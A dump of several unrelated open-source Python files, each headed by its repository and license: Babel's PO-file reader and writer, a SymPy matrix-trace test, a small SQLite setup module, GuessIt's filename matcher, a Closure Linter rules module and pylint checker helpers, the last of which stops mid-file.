assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
| apache-2.0 |
krismcfarlin/todo_angular_endpoints_sockets | bp_includes/external/babel/messages/pofile.py | 54 | 16041 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
"""Reading and writing of files in the ``gettext`` PO (portable object)
format.
:see: `The Format of PO Files
<http://www.gnu.org/software/gettext/manual/gettext.html#PO-Files>`_
"""
from datetime import date, datetime
import os
import re
from babel import __version__ as VERSION
from babel.messages.catalog import Catalog, Message
from babel.util import set, wraptext, LOCALTZ
__all__ = ['read_po', 'write_po']
__docformat__ = 'restructuredtext en'
def unescape(string):
r"""Reverse `escape` the given string.
>>> print unescape('"Say:\\n \\"hello, world!\\"\\n"')
Say:
"hello, world!"
<BLANKLINE>
:param string: the string to unescape
:return: the unescaped string
:rtype: `str` or `unicode`
"""
return string[1:-1].replace('\\\\', '\\') \
.replace('\\t', '\t') \
.replace('\\r', '\r') \
.replace('\\n', '\n') \
.replace('\\"', '\"')
def denormalize(string):
r"""Reverse the normalization done by the `normalize` function.
>>> print denormalize(r'''""
... "Say:\n"
... " \"hello, world!\"\n"''')
Say:
"hello, world!"
<BLANKLINE>
>>> print denormalize(r'''""
... "Say:\n"
... " \"Lorem ipsum dolor sit "
... "amet, consectetur adipisicing"
... " elit, \"\n"''')
Say:
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
<BLANKLINE>
:param string: the string to denormalize
:return: the denormalized string
:rtype: `unicode` or `str`
"""
if string.startswith('""'):
lines = []
for line in string.splitlines()[1:]:
lines.append(unescape(line))
return ''.join(lines)
else:
return unescape(string)
def read_po(fileobj, locale=None, domain=None, ignore_obsolete=False):
"""Read messages from a ``gettext`` PO (portable object) file from the given
file-like object and return a `Catalog`.
>>> from StringIO import StringIO
>>> buf = StringIO('''
... #: main.py:1
... #, fuzzy, python-format
... msgid "foo %(name)s"
... msgstr ""
...
... # A user comment
... #. An auto comment
... #: main.py:3
... msgid "bar"
... msgid_plural "baz"
... msgstr[0] ""
... msgstr[1] ""
... ''')
>>> catalog = read_po(buf)
>>> catalog.revision_date = datetime(2007, 04, 01)
>>> for message in catalog:
... if message.id:
... print (message.id, message.string)
... print ' ', (message.locations, message.flags)
... print ' ', (message.user_comments, message.auto_comments)
(u'foo %(name)s', '')
([(u'main.py', 1)], set([u'fuzzy', u'python-format']))
([], [])
((u'bar', u'baz'), ('', ''))
([(u'main.py', 3)], set([]))
([u'A user comment'], [u'An auto comment'])
:param fileobj: the file-like object to read the PO file from
:param locale: the locale identifier or `Locale` object, or `None`
if the catalog is not bound to a locale (which basically
means it's a template)
:param domain: the message domain
:param ignore_obsolete: whether to ignore obsolete messages in the input
:return: a `Catalog` object holding the parsed messages
:rtype: `Catalog`
"""
catalog = Catalog(locale=locale, domain=domain)
counter = [0]
offset = [0]
messages = []
translations = []
locations = []
flags = []
user_comments = []
auto_comments = []
obsolete = [False]
in_msgid = [False]
in_msgstr = [False]
def _add_message():
translations.sort()
if len(messages) > 1:
msgid = tuple([denormalize(m) for m in messages])
else:
msgid = denormalize(messages[0])
if isinstance(msgid, (list, tuple)):
string = []
for idx in range(catalog.num_plurals):
try:
string.append(translations[idx])
except IndexError:
string.append((idx, ''))
string = tuple([denormalize(t[1]) for t in string])
else:
string = denormalize(translations[0][1])
message = Message(msgid, string, list(locations), set(flags),
auto_comments, user_comments, lineno=offset[0] + 1)
if obsolete[0]:
if not ignore_obsolete:
catalog.obsolete[msgid] = message
else:
catalog[msgid] = message
del messages[:]; del translations[:]; del locations[:];
del flags[:]; del auto_comments[:]; del user_comments[:]
obsolete[0] = False
counter[0] += 1
def _process_message_line(lineno, line):
if line.startswith('msgid_plural'):
in_msgid[0] = True
msg = line[12:].lstrip()
messages.append(msg)
elif line.startswith('msgid'):
in_msgid[0] = True
offset[0] = lineno
txt = line[5:].lstrip()
if messages:
_add_message()
messages.append(txt)
elif line.startswith('msgstr'):
in_msgid[0] = False
in_msgstr[0] = True
msg = line[6:].lstrip()
if msg.startswith('['):
idx, msg = msg[1:].split(']', 1)
translations.append([int(idx), msg.lstrip()])
else:
translations.append([0, msg])
elif line.startswith('"'):
if in_msgid[0]:
messages[-1] += u'\n' + line.rstrip()
elif in_msgstr[0]:
translations[-1][1] += u'\n' + line.rstrip()
for lineno, line in enumerate(fileobj.readlines()):
line = line.strip()
if not isinstance(line, unicode):
line = line.decode(catalog.charset)
if line.startswith('#'):
in_msgid[0] = in_msgstr[0] = False
if messages and translations:
_add_message()
if line[1:].startswith(':'):
for location in line[2:].lstrip().split():
pos = location.rfind(':')
if pos >= 0:
try:
lineno = int(location[pos + 1:])
except ValueError:
continue
locations.append((location[:pos], lineno))
elif line[1:].startswith(','):
for flag in line[2:].lstrip().split(','):
flags.append(flag.strip())
elif line[1:].startswith('~'):
obsolete[0] = True
_process_message_line(lineno, line[2:].lstrip())
elif line[1:].startswith('.'):
# These are called auto-comments
comment = line[2:].strip()
if comment: # Just check that we're not adding empty comments
auto_comments.append(comment)
else:
# These are called user comments
user_comments.append(line[1:].strip())
else:
_process_message_line(lineno, line)
if messages:
_add_message()
# No actual messages found, but there was some info in comments, from which
# we'll construct an empty header message
elif not counter[0] and (flags or user_comments or auto_comments):
messages.append(u'')
translations.append([0, u''])
_add_message()
return catalog
WORD_SEP = re.compile('('
r'\s+|' # any whitespace
r'[^\s\w]*\w+[a-zA-Z]-(?=\w+[a-zA-Z])|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w)' # em-dash
')')
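# Note: because the whole WORD_SEP pattern is one capturing group, re.split()
# keeps the separators in its result, so normalize() below can re-join the
# chunks without losing whitespace, hyphens or em-dashes.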
def escape(string):
r"""Escape the given string so that it can be included in double-quoted
strings in ``PO`` files.
>>> escape('''Say:
... "hello, world!"
... ''')
'"Say:\\n \\"hello, world!\\"\\n"'
:param string: the string to escape
:return: the escaped string
:rtype: `str` or `unicode`
"""
return '"%s"' % string.replace('\\', '\\\\') \
.replace('\t', '\\t') \
.replace('\r', '\\r') \
.replace('\n', '\\n') \
.replace('\"', '\\"')
def normalize(string, prefix='', width=76):
r"""Convert a string into a format that is appropriate for .po files.
>>> print normalize('''Say:
... "hello, world!"
... ''', width=None)
""
"Say:\n"
" \"hello, world!\"\n"
>>> print normalize('''Say:
... "Lorem ipsum dolor sit amet, consectetur adipisicing elit, "
... ''', width=32)
""
"Say:\n"
" \"Lorem ipsum dolor sit "
"amet, consectetur adipisicing"
" elit, \"\n"
:param string: the string to normalize
:param prefix: a string that should be prepended to every line
:param width: the maximum line width; use `None`, 0, or a negative number
to completely disable line wrapping
:return: the normalized string
:rtype: `unicode`
"""
if width and width > 0:
prefixlen = len(prefix)
lines = []
for idx, line in enumerate(string.splitlines(True)):
if len(escape(line)) + prefixlen > width:
chunks = WORD_SEP.split(line)
chunks.reverse()
while chunks:
buf = []
size = 2
while chunks:
l = len(escape(chunks[-1])) - 2 + prefixlen
if size + l < width:
buf.append(chunks.pop())
size += l
else:
if not buf:
# handle long chunks by putting them on a
# separate line
buf.append(chunks.pop())
break
lines.append(u''.join(buf))
else:
lines.append(line)
else:
lines = string.splitlines(True)
if len(lines) <= 1:
return escape(string)
# Remove empty trailing line
if lines and not lines[-1]:
del lines[-1]
lines[-1] += '\n'
return u'""\n' + u'\n'.join([(prefix + escape(l)) for l in lines])
def write_po(fileobj, catalog, width=76, no_location=False, omit_header=False,
sort_output=False, sort_by_file=False, ignore_obsolete=False,
include_previous=False):
r"""Write a ``gettext`` PO (portable object) template file for a given
message catalog to the provided file-like object.
>>> catalog = Catalog()
>>> catalog.add(u'foo %(name)s', locations=[('main.py', 1)],
... flags=('fuzzy',))
>>> catalog.add((u'bar', u'baz'), locations=[('main.py', 3)])
>>> from StringIO import StringIO
>>> buf = StringIO()
>>> write_po(buf, catalog, omit_header=True)
>>> print buf.getvalue()
#: main.py:1
#, fuzzy, python-format
msgid "foo %(name)s"
msgstr ""
<BLANKLINE>
#: main.py:3
msgid "bar"
msgid_plural "baz"
msgstr[0] ""
msgstr[1] ""
<BLANKLINE>
<BLANKLINE>
:param fileobj: the file-like object to write to
:param catalog: the `Catalog` instance
:param width: the maximum line width for the generated output; use `None`,
0, or a negative number to completely disable line wrapping
:param no_location: do not emit a location comment for every message
:param omit_header: do not include the ``msgid ""`` entry at the top of the
output
:param sort_output: whether to sort the messages in the output by msgid
:param sort_by_file: whether to sort the messages in the output by their
locations
:param ignore_obsolete: whether to ignore obsolete messages and not include
them in the output; by default they are included as
comments
:param include_previous: include the old msgid as a comment when
updating the catalog
"""
def _normalize(key, prefix=''):
return normalize(key, prefix=prefix, width=width) \
.encode(catalog.charset, 'backslashreplace')
def _write(text):
if isinstance(text, unicode):
text = text.encode(catalog.charset)
fileobj.write(text)
def _write_comment(comment, prefix=''):
# xgettext always wraps comments even if --no-wrap is passed;
# provide the same behaviour
if width and width > 0:
_width = width
else:
_width = 76
for line in wraptext(comment, _width):
_write('#%s %s\n' % (prefix, line.strip()))
def _write_message(message, prefix=''):
if isinstance(message.id, (list, tuple)):
_write('%smsgid %s\n' % (prefix, _normalize(message.id[0], prefix)))
_write('%smsgid_plural %s\n' % (
prefix, _normalize(message.id[1], prefix)
))
for idx in range(catalog.num_plurals):
try:
string = message.string[idx]
except IndexError:
string = ''
_write('%smsgstr[%d] %s\n' % (
prefix, idx, _normalize(string, prefix)
))
else:
_write('%smsgid %s\n' % (prefix, _normalize(message.id, prefix)))
_write('%smsgstr %s\n' % (
prefix, _normalize(message.string or '', prefix)
))
messages = list(catalog)
if sort_output:
messages.sort()
elif sort_by_file:
messages.sort(lambda x,y: cmp(x.locations, y.locations))
for message in messages:
if not message.id: # This is the header "message"
if omit_header:
continue
comment_header = catalog.header_comment
if width and width > 0:
lines = []
for line in comment_header.splitlines():
lines += wraptext(line, width=width,
subsequent_indent='# ')
comment_header = u'\n'.join(lines) + u'\n'
_write(comment_header)
for comment in message.user_comments:
_write_comment(comment)
for comment in message.auto_comments:
_write_comment(comment, prefix='.')
if not no_location:
locs = u' '.join([u'%s:%d' % (filename.replace(os.sep, '/'), lineno)
for filename, lineno in message.locations])
_write_comment(locs, prefix=':')
if message.flags:
_write('#%s\n' % ', '.join([''] + list(message.flags)))
if message.previous_id and include_previous:
_write_comment('msgid %s' % _normalize(message.previous_id[0]),
prefix='|')
if len(message.previous_id) > 1:
_write_comment('msgid_plural %s' % _normalize(
message.previous_id[1]
), prefix='|')
_write_message(message)
_write('\n')
if not ignore_obsolete:
for message in catalog.obsolete.values():
for comment in message.user_comments:
_write_comment(comment)
_write_message(message, prefix='#~ ')
_write('\n')
| lgpl-3.0 |
yashsharan/sympy | sympy/matrices/expressions/tests/test_trace.py | 83 | 2693 | from sympy.core import Lambda, S, symbols
from sympy.concrete import Sum
from sympy.functions import adjoint, conjugate, transpose
from sympy.matrices import eye, Matrix, ShapeError, ImmutableMatrix
from sympy.matrices.expressions import (
Adjoint, Identity, FunctionMatrix, MatrixExpr, MatrixSymbol, Trace,
ZeroMatrix, trace, MatPow, MatAdd, MatMul
)
from sympy.utilities.pytest import raises, XFAIL
n = symbols('n', integer=True)
A = MatrixSymbol('A', n, n)
B = MatrixSymbol('B', n, n)
C = MatrixSymbol('C', 3, 4)
def test_Trace():
assert isinstance(Trace(A), Trace)
assert not isinstance(Trace(A), MatrixExpr)
raises(ShapeError, lambda: Trace(C))
assert trace(eye(3)) == 3
assert trace(Matrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])) == 15
assert adjoint(Trace(A)) == trace(Adjoint(A))
assert conjugate(Trace(A)) == trace(Adjoint(A))
assert transpose(Trace(A)) == Trace(A)
A / Trace(A) # Make sure this is possible
# Some easy simplifications
assert trace(Identity(5)) == 5
assert trace(ZeroMatrix(5, 5)) == 0
assert trace(2*A*B) == 2*Trace(A*B)
assert trace(A.T) == trace(A)
i, j = symbols('i j')
F = FunctionMatrix(3, 3, Lambda((i, j), i + j))
assert trace(F) == (0 + 0) + (1 + 1) + (2 + 2)
raises(TypeError, lambda: Trace(S.One))
assert Trace(A).arg is A
assert str(trace(A)) == str(Trace(A).doit())
def test_Trace_A_plus_B():
assert trace(A + B) == Trace(A) + Trace(B)
assert Trace(A + B).arg == MatAdd(A, B)
assert Trace(A + B).doit() == Trace(A) + Trace(B)
def test_Trace_MatAdd_doit():
# See issue #9028
X = ImmutableMatrix([[1, 2, 3]]*3)
Y = MatrixSymbol('Y', 3, 3)
q = MatAdd(X, 2*X, Y, -3*Y)
assert Trace(q).arg == q
assert Trace(q).doit() == 18 - 2*Trace(Y)
def test_Trace_MatPow_doit():
X = Matrix([[1, 2], [3, 4]])
assert Trace(X).doit() == 5
q = MatPow(X, 2)
assert Trace(q).arg == q
assert Trace(q).doit() == 29
def test_Trace_MutableMatrix_plus():
# See issue #9043
X = Matrix([[1, 2], [3, 4]])
assert Trace(X) + Trace(X) == 2*Trace(X)
def test_Trace_doit_deep_False():
X = Matrix([[1, 2], [3, 4]])
q = MatPow(X, 2)
assert Trace(q).doit(deep=False).arg == q
q = MatAdd(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
q = MatMul(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
def test_trace_constant_factor():
# Issue 9052: gave 2*Trace(MatMul(A)) instead of 2*Trace(A)
assert trace(2*A) == 2*Trace(A)
X = ImmutableMatrix([[1, 2], [3, 4]])
assert trace(MatMul(2, X)) == 10
@XFAIL
def test_rewrite():
assert isinstance(trace(A).rewrite(Sum), Sum)
| bsd-3-clause |
Diaoul/Dobby | dobby/db.py | 1 | 1627 | # Copyright 2011 Antoine Bertin <[email protected]>
#
# This file is part of Dobby.
#
# Dobby is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dobby is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Dobby. If not, see <http://www.gnu.org/licenses/>.
from models import Base
from models.actions import Action
from models.actions.datetime import Datetime
from models.actions.feed import Feed
from models.actions.weather import Weather
from models.association import Association
from models.command import Command
from models.scenario import Scenario
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm.session import sessionmaker
import logging
import os
logger = logging.getLogger(__name__)
def initDb(path):
"""Initialize the database (create or update it as needed) and return a sessionmaker bound to it
:return: a session maker object
:rtype: SessionMaker
"""
logger.info(u'Initializing database')
engine = create_engine('sqlite:///' + path)
if not os.path.exists(path):
logger.debug(u'Database does not exist, creating...')
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)
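# Illustrative usage sketch (the path below is an assumption):
# SessionMaker = initDb('/var/lib/dobby/dobby.db')
# session = SessionMaker()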
| lgpl-3.0 |
nomaro/SickBeard_Backup | lib/guessit/matcher.py | 40 | 6496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <[email protected]>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import PY3, u, base_text_type
from guessit.matchtree import MatchTree
from guessit.textutils import normalize_unicode
import logging
log = logging.getLogger(__name__)
class IterativeMatcher(object):
def __init__(self, filename, filetype='autodetect', opts=None):
"""An iterative matcher tries to match different patterns that appear
in the filename.
The 'filetype' argument indicates which type of file you want to match.
If it is 'autodetect', the matcher will try to see whether it can guess
that the file corresponds to an episode, or otherwise will assume it is
a movie.
The recognized 'filetype' values are:
[ autodetect, subtitle, movie, moviesubtitle, episode, episodesubtitle ]
The IterativeMatcher works mainly in 2 steps:
First, it splits the filename into a match_tree, which is a tree of groups
which have a semantic meaning, such as episode number, movie title,
etc...
The match_tree created looks like the following:
0000000000000000000000000000000000000000000000000000000000000000000000000000000000 111
0000011111111111112222222222222233333333444444444444444455555555666777777778888888 000
0000000000000000000000000000000001111112011112222333333401123334000011233340000000 000
__________________(The.Prestige).______.[____.HP.______.{__-___}.St{__-___}.Chaps].___
xxxxxttttttttttttt ffffff vvvv xxxxxx ll lll xx xxx ccc
[XCT].Le.Prestige.(The.Prestige).DVDRip.[x264.HP.He-Aac.{Fr-Eng}.St{Fr-Eng}.Chaps].mkv
The first 3 lines indicates the group index in which a char in the
filename is located. So for instance, x264 is the group (0, 4, 1), and
it corresponds to a video codec, denoted by the letter'v' in the 4th line.
(for more info, see guess.matchtree.to_string)
Second, it tries to merge all this information into a single object
containing all the found properties, and does some (basic) conflict
resolution when they arise.
"""
valid_filetypes = ('autodetect', 'subtitle', 'video',
'movie', 'moviesubtitle',
'episode', 'episodesubtitle')
if filetype not in valid_filetypes:
raise ValueError("filetype needs to be one of %s" % valid_filetypes)
if not PY3 and not isinstance(filename, unicode):
log.warning('Given filename to matcher is not unicode...')
filename = filename.decode('utf-8')
filename = normalize_unicode(filename)
if opts is None:
opts = []
elif isinstance(opts, base_text_type):
opts = opts.split()
self.match_tree = MatchTree(filename)
mtree = self.match_tree
mtree.guess.set('type', filetype, confidence=1.0)
def apply_transfo(transfo_name, *args, **kwargs):
transfo = __import__('guessit.transfo.' + transfo_name,
globals=globals(), locals=locals(),
fromlist=['process'], level=0)
transfo.process(mtree, *args, **kwargs)
# 1- first split our path into dirs + basename + ext
apply_transfo('split_path_components')
# 2- guess the file type now (will be useful later)
apply_transfo('guess_filetype', filetype)
if mtree.guess['type'] == 'unknown':
return
# 3- split each of those into explicit groups (separated by parentheses
# or square brackets)
apply_transfo('split_explicit_groups')
# 4- try to match information for specific patterns
# NOTE: order needs to comply to the following:
# - website before language (eg: tvu.org.ru vs russian)
# - language before episodes_rexps
# - properties before language (eg: he-aac vs hebrew)
# - release_group before properties (eg: XviD-?? vs xvid)
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps',
'guess_episodes_rexps', 'guess_weak_episodes_rexps' ]
else:
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps' ]
if 'nolanguage' in opts:
strategy.remove('guess_language')
for name in strategy:
apply_transfo(name)
# more guessers for both movies and episodes
for name in ['guess_bonus_features', 'guess_year']:
apply_transfo(name)
if 'nocountry' not in opts:
apply_transfo('guess_country')
# split into '-' separated subgroups (with required separator chars
# around the dash)
apply_transfo('split_on_dash')
# 5- try to identify the remaining unknown groups by looking at their
# position relative to other known elements
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
apply_transfo('guess_episode_info_from_position')
else:
apply_transfo('guess_movie_title_from_position')
# 6- perform some post-processing steps
apply_transfo('post_process')
log.debug('Found match tree:\n%s' % u(mtree))
def matched(self):
return self.match_tree.matched()
| gpl-3.0 |
markYoungH/chromium.src | third_party/closure_linter/closure_linter/errorrules.py | 124 | 2276 | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linter error rules class for Closure Linter."""
__author__ = '[email protected] (Robert Walker)'
import gflags as flags
from closure_linter import errors
FLAGS = flags.FLAGS
flags.DEFINE_boolean('jsdoc', True,
'Whether to report errors for missing JsDoc.')
flags.DEFINE_list('disable', None,
'Disable specific error. Usage Ex.: gjslint --disable 1,'
'0011 foo.js.')
flags.DEFINE_integer('max_line_length', 80, 'Maximum line length allowed '
'without warning.', lower_bound=1)
disabled_error_nums = None
def GetMaxLineLength():
"""Returns allowed maximum length of line.
Returns:
Length of line allowed without any warning.
"""
return FLAGS.max_line_length
def ShouldReportError(error):
"""Whether the given error should be reported.
Returns:
True for all errors except missing documentation errors and disabled
errors. For missing documentation, it returns the value of the
jsdoc flag.
"""
global disabled_error_nums
if disabled_error_nums is None:
disabled_error_nums = []
if FLAGS.disable:
for error_str in FLAGS.disable:
error_num = 0
try:
error_num = int(error_str)
except ValueError:
pass
disabled_error_nums.append(error_num)
return ((FLAGS.jsdoc or error not in (
errors.MISSING_PARAMETER_DOCUMENTATION,
errors.MISSING_RETURN_DOCUMENTATION,
errors.MISSING_MEMBER_DOCUMENTATION,
errors.MISSING_PRIVATE,
errors.MISSING_JSDOC_TAG_THIS)) and
(not FLAGS.disable or error not in disabled_error_nums))
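def _DemoShouldReportError():
"""Illustrative sketch only: probe one documentation error against the flags.
Returns True with default flags and False when --nojsdoc is passed.
"""
return ShouldReportError(errors.MISSING_PARAMETER_DOCUMENTATION)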
| bsd-3-clause |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/pylint/checkers/utils.py | 3 | 29753 | # Copyright (c) 2006-2007, 2009-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2016 Claudiu Popa <[email protected]>
# Copyright (c) 2015 Radu Ciorba <[email protected]>
# Copyright (c) 2015 Dmitry Pribysh <[email protected]>
# Copyright (c) 2016 Ashley Whetter <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
# pylint: disable=W0611
"""Some functions that may be useful for various checkers.
"""
import collections
import functools
try:
from functools import singledispatch as singledispatch
except ImportError:
# pylint: disable=import-error
from singledispatch import singledispatch as singledispatch
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import itertools
import re
import sys
import string
import warnings
import six
from six.moves import map, builtins # pylint: disable=redefined-builtin
import astroid
from astroid import bases as _bases
from astroid import scoped_nodes
BUILTINS_NAME = builtins.__name__
COMP_NODE_TYPES = (astroid.ListComp, astroid.SetComp,
astroid.DictComp, astroid.GeneratorExp)
PY3K = sys.version_info[0] == 3
if not PY3K:
EXCEPTIONS_MODULE = "exceptions"
else:
EXCEPTIONS_MODULE = "builtins"
ABC_METHODS = set(('abc.abstractproperty', 'abc.abstractmethod',
'abc.abstractclassmethod', 'abc.abstractstaticmethod'))
ITER_METHOD = '__iter__'
NEXT_METHOD = 'next' if six.PY2 else '__next__'
GETITEM_METHOD = '__getitem__'
SETITEM_METHOD = '__setitem__'
DELITEM_METHOD = '__delitem__'
CONTAINS_METHOD = '__contains__'
KEYS_METHOD = 'keys'
# Dictionary which maps the number of expected parameters a
# special method can have to a set of special methods.
# The following keys are used to denote the parameters restrictions:
#
# * None: variable number of parameters
# * number: exactly that number of parameters
# * tuple: these are the odd ones. Basically it means that the function
# can work with any number of arguments from that tuple,
# although it's best to implement it in order to accept
# all of them.
_SPECIAL_METHODS_PARAMS = {
None: ('__new__', '__init__', '__call__'),
0: ('__del__', '__repr__', '__str__', '__bytes__', '__hash__', '__bool__',
'__dir__', '__len__', '__length_hint__', '__iter__', '__reversed__',
'__neg__', '__pos__', '__abs__', '__invert__', '__complex__', '__int__',
'__float__', '__index__', '__enter__', '__aenter__', '__getnewargs_ex__',
'__getnewargs__', '__getstate__', '__reduce__', '__copy__',
'__unicode__', '__nonzero__', '__await__', '__aiter__', '__anext__',
'__fspath__'),
1: ('__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__',
'__ge__', '__getattr__', '__getattribute__', '__delattr__',
'__delete__', '__instancecheck__', '__subclasscheck__',
'__getitem__', '__missing__', '__delitem__', '__contains__',
'__add__', '__sub__', '__mul__', '__truediv__', '__floordiv__',
'__mod__', '__divmod__', '__lshift__', '__rshift__', '__and__',
'__xor__', '__or__', '__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__',
'__rand__', '__rxor__', '__ror__', '__iadd__', '__isub__', '__imul__',
'__itruediv__', '__ifloordiv__', '__imod__', '__ilshift__',
'__irshift__', '__iand__', '__ixor__', '__ior__', '__ipow__',
'__setstate__', '__reduce_ex__', '__deepcopy__', '__cmp__',
'__matmul__', '__rmatmul__', '__div__'),
2: ('__setattr__', '__get__', '__set__', '__setitem__'),
3: ('__exit__', '__aexit__'),
(0, 1): ('__round__', ),
}
SPECIAL_METHODS_PARAMS = {
name: params
for params, methods in _SPECIAL_METHODS_PARAMS.items()
for name in methods
}
PYMETHODS = set(SPECIAL_METHODS_PARAMS)
class NoSuchArgumentError(Exception):
pass
def is_inside_except(node):
"""Returns true if node is inside the name of an except handler."""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
return current and current is current.parent.name
def get_all_elements(node):
"""Recursively returns all atoms in nested lists and tuples."""
if isinstance(node, (astroid.Tuple, astroid.List)):
for child in node.elts:
for e in get_all_elements(child):
yield e
else:
yield node
def clobber_in_except(node):
"""Checks if an assignment node in an except handler clobbers an existing
variable.
Returns (True, args for W0623) if assignment clobbers an existing variable,
(False, None) otherwise.
"""
if isinstance(node, astroid.AssignAttr):
return (True, (node.attrname, 'object %r' % (node.expr.as_string(),)))
elif isinstance(node, astroid.AssignName):
name = node.name
if is_builtin(name):
return (True, (name, 'builtins'))
else:
stmts = node.lookup(name)[1]
if (stmts and not isinstance(stmts[0].assign_type(),
(astroid.Assign, astroid.AugAssign,
astroid.ExceptHandler))):
return (True, (name, 'outer scope (line %s)' % stmts[0].fromlineno))
return (False, None)
def is_super(node):
"""return True if the node is referencing the "super" builtin function
"""
if getattr(node, 'name', None) == 'super' and \
node.root().name == BUILTINS_NAME:
return True
return False
def is_error(node):
"""return true if the function does nothing but raising an exception"""
for child_node in node.get_children():
if isinstance(child_node, astroid.Raise):
return True
return False
def is_raising(body):
"""return true if the given statement node raise an exception"""
for node in body:
if isinstance(node, astroid.Raise):
return True
return False
builtins = builtins.__dict__.copy()
SPECIAL_BUILTINS = ('__builtins__',) # '__path__', '__file__')
def is_builtin_object(node):
"""Returns True if the given node is an object from the __builtin__ module."""
return node and node.root().name == BUILTINS_NAME
def is_builtin(name):
"""return true if <name> could be considered as a builtin defined by python
"""
return name in builtins or name in SPECIAL_BUILTINS
def is_defined_before(var_node):
"""return True if the variable node is defined by a parent node (list,
set, dict, or generator comprehension, lambda) or in a previous sibling
node on the same line (statement_defining ; statement_using)
"""
varname = var_node.name
_node = var_node.parent
while _node:
if isinstance(_node, COMP_NODE_TYPES):
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.For):
for ass_node in _node.target.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.With):
for expr, ids in _node.items:
if expr.parent_of(var_node):
break
if (ids and
isinstance(ids, astroid.AssignName) and
ids.name == varname):
return True
elif isinstance(_node, (astroid.Lambda, astroid.FunctionDef)):
if _node.args.is_argument(varname):
# If the name is found inside a default value
# of a function, then let the search continue
# in the parent's tree.
if _node.args.parent_of(var_node):
try:
_node.args.default_value(varname)
_node = _node.parent
continue
except astroid.NoDefault:
pass
return True
if getattr(_node, 'name', None) == varname:
return True
break
elif isinstance(_node, astroid.ExceptHandler):
if isinstance(_node.name, astroid.AssignName):
ass_node = _node.name
if ass_node.name == varname:
return True
_node = _node.parent
# possibly multiple statements on the same line using semi colon separator
stmt = var_node.statement()
_node = stmt.previous_sibling()
lineno = stmt.fromlineno
while _node and _node.fromlineno == lineno:
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
for imp_node in _node.nodes_of_class((astroid.ImportFrom, astroid.Import)):
if varname in [name[1] or name[0] for name in imp_node.names]:
return True
_node = _node.previous_sibling()
return False
def is_func_default(node):
"""return true if the given Name node is used in function default argument's
value
"""
parent = node.scope()
if isinstance(parent, astroid.FunctionDef):
for default_node in parent.args.defaults:
for default_name_node in default_node.nodes_of_class(astroid.Name):
if default_name_node is node:
return True
return False
def is_func_decorator(node):
"""return true if the name is used in function decorator"""
parent = node.parent
while parent is not None:
if isinstance(parent, astroid.Decorators):
return True
if (parent.is_statement or
isinstance(parent, (astroid.Lambda,
scoped_nodes.ComprehensionScope,
scoped_nodes.ListComp))):
break
parent = parent.parent
return False
def is_ancestor_name(frame, node):
"""return True if `frame` is a astroid.Class node with `node` in the
subtree of its bases attribute
"""
try:
bases = frame.bases
except AttributeError:
return False
for base in bases:
if node in base.nodes_of_class(astroid.Name):
return True
return False
def assign_parent(node):
"""return the higher parent which is not an AssName, Tuple or List node
"""
while node and isinstance(node, (astroid.AssignName,
astroid.Tuple,
astroid.List)):
node = node.parent
return node
def overrides_a_method(class_node, name):
"""return True if <name> is a method overridden from an ancestor"""
for ancestor in class_node.ancestors():
if name in ancestor and isinstance(ancestor[name], astroid.FunctionDef):
return True
return False
